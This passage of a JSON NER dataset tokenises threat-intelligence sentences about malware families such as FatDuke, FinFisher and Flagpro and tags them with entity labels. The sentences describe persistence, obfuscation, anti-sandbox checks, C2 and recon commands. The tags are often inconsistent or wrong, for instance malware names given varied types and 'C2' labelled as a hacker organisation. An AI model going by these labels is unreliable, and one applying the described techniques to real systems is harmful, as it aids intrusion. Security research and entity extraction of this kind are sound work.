"O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "original", - "variant", - "of", - "FakeM", - "encrypts", - "C2", - "traffic", - "using", - "a", - "custom", - "encryption", - "cipher", - "that", - "uses", - "an", - "XOR", - "key", - "of", - "“YHCRA”", - "and", - "bit", - "rotation", - "between", - "each", - "XOR", - "operation.", - "Some", - "variants", - "of", - "FakeM", - "use", - "RC4", - "to", - "encrypt", - "C2", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "FatDuke", - "has", - "been", - "packed", - "with", - "junk", - "code", - "and", - "strings." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "copy", - "files", - "and", - "directories", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "decrypt", - "AES", - "encrypted", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "has", - "used", - "several", - "C2", - "servers", - "per", - "targeted", - "organization." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "secure", - "delete", - "its", - "DLL." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "enumerate", - "directories", - "on", - "target", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "used", - "pipes", - "to", - "connect", - "machines", - "with", - "restricted", - "internet", - "access", - "to", - "remote", - "machines", - "via", - "other", - "infected", - "hosts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "has", - "attempted", - "to", - "mimic", - "a", - "compromised", - "user's", - "traffic", - "by", - "using", - "the", - "same", - "user", - "agent", - "as", - "the", - "installed", - "browser." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "call", - "<code>ShellExecuteW</code>", - "to", - "open", - "the", - "default", - "browser", - "on", - "the", - "URL", - "localhost." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "use", - "base64", - "encoding,", - "string", - "stacking,", - "and", - "opaque", - "predicates", - "for", - "obfuscation." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-HackOrg", - "B-Features", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "has", - "the", - "ability", - "to", - "execute", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "list", - "running", - "processes", - "on", - "the", - "localhost." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "get", - "user", - "agent", - "strings", - "for", - "the", - "default", - "browser", - "from", - "<code>HKCU\\Software\\Classes\\http\\shell\\open\\command</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "has", - "used", - "<code>HKLM\\SOFTWARE\\Microsoft\\CurrentVersion\\Run</code>", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "execute", - "via", - "rundll32." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "has", - "been", - "regularly", - "repacked", - "by", - "its", - "operators", - "to", - "create", - "large", - "binaries", - "and", - "evade", - "detection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "AES", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "collect", - "the", - "user", - "name,", - "Windows", - "version,", - "computer", - "name,", - "and", - "available", - "space", - "on", - "discs", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "identify", - "the", - "MAC", - "address", - "on", - "the", - "target", - "computer." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "turn", - "itself", - "on", - "or", - "off", - "at", - "random", - "intervals." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FatDuke", - "can", - "be", - "controlled", - "via", - "a", - "custom", - "C2", - "protocol", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Felismus", - "can", - "download", - "files", - "from", - "remote", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Felismus", - "has", - "masqueraded", - "as", - "legitimate", - "Adobe", - "Content", - "Management", - "System", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Felismus", - "checks", - "for", - "processes", - "associated", - "with", - "anti-virus", - "vendors." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "Some", - "Felismus", - "samples", - "use", - "a", - "custom", - "method", - "for", - "C2", - "traffic", - "that", - "utilizes", - "Base64." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Some", - "Felismus", - "samples", - "use", - "a", - "custom", - "encryption", - "method", - "for", - "C2", - "traffic", - "that", - "utilizes", - "AES", - "and", - "multiple", - "keys." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Felismus", - "collects", - "the", - "system", - "information,", - "including", - "hostname", - "and", - "OS", - "version,", - "and", - "sends", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Felismus", - "collects", - "the", - "victim", - "LAN", - "IP", - "address", - "and", - "sends", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Felismus", - "collects", - "the", - "current", - "username", - "and", - "sends", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Felismus", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Felismus", - "uses", - "command", - "line", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "can", - "use", - "COM", - "hijacking", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "can", - "delete", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "has", - "the", - "ability", - "to", - "add", - "a", - "Class", - "ID", - "in", - "the", - "current", - "user", - "Registry", - "hive", - "to", - "enable", - "persistence", - "mechanisms." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "can", - "run", - "<code>GET.WORKSPACE</code>", - "in", - "Microsoft", - "Excel", - "to", - "check", - "if", - "a", - "mouse", - "is", - "present." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "can", - "use", - "PowerShell", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "has", - "checked", - "for", - "AV", - "software", - "as", - "part", - "of", - "its", - "persistence", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "can", - "run", - "anti-sandbox", - "checks", - "using", - "the", - "Microsoft", - "Excel", - "4.0", - "function", - "<code>GET.WORKSPACE</code>", - "to", - "determine", - "the", - "OS", - "version,", - "if", - "there", - "is", - "a", - "mouse", - "present,", - "and", - "if", - "the", - "host", - "is", - "capable", - "of", - "playing", - "sounds." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "can", - "use", - "<code>GET.WORKSPACE</code>", - "in", - "Microsoft", - "Excel", - "to", - "determine", - "the", - "OS", - "version", - "of", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ferocious", - "has", - "the", - "ability", - "to", - "use", - "Visual", - "Basic", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Fgdump", - "can", - "dump", - "Windows", - "password", - "hashes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "contains", - "junk", - "code", - "in", - "its", - "functions", - "in", - "an", - "effort", - "to", - "confuse", - "disassembly", - "programs." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "Some", - "FinFisher", - "variants", - "incorporate", - "an", - "MBR", - "rootkit." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "performs", - "UAC", - "bypass." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "clears", - "the", - "system", - "event", - "logs", - "using", - "<code>", - "OpenEventLog/ClearEventLog", - "APIs", - "</code>." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "hooks", - "processes", - "by", - "modifying", - "IAT", - "pointers", - "to", - "CreateWindowEx." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "FinFisher", - "variant", - "uses", - "DLL", - "search", - "order", - "hijacking." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "uses", - "DLL", - "side-loading", - "to", - "load", - "malicious", - "programs." - ], - "ner_tags": [ - "B-Org", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "extracts", - "and", - "decrypts", - "stage", - "3", - "malware,", - "which", - "is", - "stored", - "in", - "encrypted", - "resources." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "injects", - "itself", - "into", - "various", - "processes", - "depending", - "on", - "whether", - "it", - "is", - "low", - "integrity", - "or", - "high", - "integrity." - ], - "ner_tags": [ - "B-Org", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "enumerates", - "directories", - "and", - "scans", - "for", - "certain", - "files." - ], - "ner_tags": [ - "B-Org", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "has", - "used", - "the", - "<code>KernelCallbackTable</code>", - "to", - "hijack", - "the", - "execution", - "flow", - "of", - "a", - "process", - "by", - "replacing", - "the", - "<code>__fnDWORD</code>", - "function", - "with", - "the", - "address", - "of", - "a", - "created", - "Asynchronous", - "Procedure", - "Call", - "stub", - "routine." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "B-Way", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "renames", - "one", - "of", - "its", - ".dll", - "files", - "to", - "uxtheme.dll", - "in", - "an", - "apparent", - "attempt", - "to", - "masquerade", - "as", - "a", - "legitimate", - "file." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "is", - "heavily", - "obfuscated", - "in", - "many", - "ways,", - "including", - "through", - "the", - "use", - "of", - "spaghetti", - "code", - "in", - "its", - "functions", - "in", - "an", - "effort", - "to", - "confuse", - "disassembly", - "programs.", - "It", - "also", - "uses", - "a", - "custom", - "XOR", - "algorithm", - "to", - "obfuscate", - "code." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "checks", - "its", - "parent", - "process", - "for", - "indications", - "that", - "it", - "is", - "running", - "in", - "a", - "sandbox", - "setup." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "queries", - "Registry", - "values", - "as", - "part", - "of", - "its", - "anti-sandbox", - "checks." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "establishes", - "persistence", - "by", - "creating", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows\\Run</code>." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "FinFisher", - "takes", - "a", - "screenshot", - "of", - "the", - "screen", - "and", - "displays", - "it", - "on", - "top", - "of", - "all", - "other", - "windows", - "for", - "few", - "seconds", - "in", - "an", - "apparent", - "attempt", - "to", - "hide", - "some", - "messages", - "showed", - "by", - "the", - "system", - "during", - "the", - "setup", - "process." - ], - "ner_tags": [ - "B-Org", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "probes", - "the", - "system", - "to", - "check", - "for", - "antimalware", - "processes." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "FinFisher", - "variant", - "uses", - "a", - "custom", - "packer." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "obtains", - "the", - "hardware", - "device", - "list", - "and", - "checks", - "if", - "the", - "MD5", - "of", - "the", - "vendor", - "ID", - "is", - "equal", - "to", - "a", - "predefined", - "list", - "in", - "order", - "to", - "check", - "for", - "sandbox/virtualized", - "environments." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "checks", - "if", - "the", - "victim", - "OS", - "is", - "32", - "or", - "64-bit." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "uses", - "token", - "manipulation", - "with", - "NtFilterToken", - "as", - "part", - "of", - "UAC", - "bypass." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FinFisher", - "creates", - "a", - "new", - "Windows", - "service", - "with", - "the", - "malicious", - "executable", - "for", - "persistence." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Final1stspy", - "uses", - "Python", - "code", - "to", - "deobfuscate", - "base64-encoded", - "strings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Final1stspy", - "obfuscates", - "strings", - "with", - "base64", - "encoding." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Final1stspy", - "obtains", - "a", - "list", - "of", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Final1stspy", - "creates", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Final1stspy", - "obtains", - "victim", - "Microsoft", - "Windows", - "version", - "information", - "and", - "CPU", - "architecture." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Final1stspy", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "can", - "check", - "the", - "name", - "of", - "the", - "window", - "displayed", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "can", - "collect", - "data", - "from", - "a", - "compromised", - "host,", - "including", - "Windows", - "authentication", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "exfiltrated", - "data", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "can", - "close", - "specific", - "Windows", - "Security", - "and", - "Internet", - "Explorer", - "dialog", - "boxes", - "to", - "mask", - "external", - "connections." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "can", - "download", - "additional", - "malware", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "been", - "used", - "to", - "execute", - "the", - "<code>net", - "localgroup", - "administrators</code>", - "command", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "relied", - "on", - "users", - "clicking", - "a", - "malicious", - "attachment", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Flagpro", - "can", - "download", - "malicious", - "files", - "with", - "a", - ".tmp", - "extension", - "and", - "append", - "them", - "with", - ".exe", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "can", - "use", - "Native", - "API", - "to", - "enable", - "obfuscation", - "including", - "`GetLastError`", - "and", - "`GetTickCount`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "been", - "used", - "to", - "execute", - "`net", - "view`", - "to", - "discover", - "mapped", - "network", - "shares." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "been", - "delivered", - "within", - "ZIP", - "or", - "RAR", - "password-protected", - "archived", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "been", - "used", - "to", - "run", - "the", - "<code>tasklist</code>", - "command", - "on", - "a", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "dropped", - "an", - "executable", - "file", - "to", - "the", - "startup", - "directory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "been", - "used", - "to", - "execute", - "<code>net", - "view</code>", - "on", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "the", - "ability", - "to", - "wait", - "for", - "a", - "specified", - "time", - "interval", - "between", - "communicating", - "with", - "and", - "executing", - "commands", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "been", - "distributed", - "via", - "spearphishing", - "as", - "an", - "email", - "attachment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "encoded", - "bidirectional", - "data", - "communications", - "between", - "a", - "target", - "system", - "and", - "C2", - "server", - "using", - "Base64." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "can", - "check", - "whether", - "the", - "target", - "system", - "is", - "using", - "Japanese,", - "Taiwanese,", - "or", - "English", - "through", - "detection", - "of", - "specific", - "Windows", - "Security", - "and", - "Internet", - "Explorer", - "dialog." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "B-Area", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "been", - "used", - "to", - "execute", - "the", - "<code>ipconfig", - "/all</code>", - "command", - "on", - "a", - "victim", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "been", - "used", - "to", - "execute", - "<code>netstat", - "-ano</code>", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "has", - "been", - "used", - "to", - "run", - "the", - "<code>whoami</code>", - "command", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flagpro", - "can", - "execute", - "malicious", - "VBA", - "macros", - "embedded", - "in", - ".xlsm", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Flagpro", - "can", - "communicate", - "with", - "its", - "C2", - "using", - "HTTP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Flagpro", - "can", - "use", - "`cmd.exe`", - "to", - "execute", - "commands", - "received", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flame", - "can", - "record", - "audio", - "using", - "any", - "existing", - "hardware", - "recording", - "devices." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flame", - "can", - "use", - "Windows", - "Authentication", - "Packages", - "for", - "persistence." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Tool", - "B-Exp", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Flame", - "has", - "a", - "module", - "named", - "BeetleJuice", - "that", - "contains", - "Bluetooth", - "functionality", - "that", - "may", - "be", - "used", - "in", - "different", - "ways,", - "including", - "transmitting", - "encoded", - "information", - "from", - "the", - "infected", - "system", - "over", - "the", - "Bluetooth", - 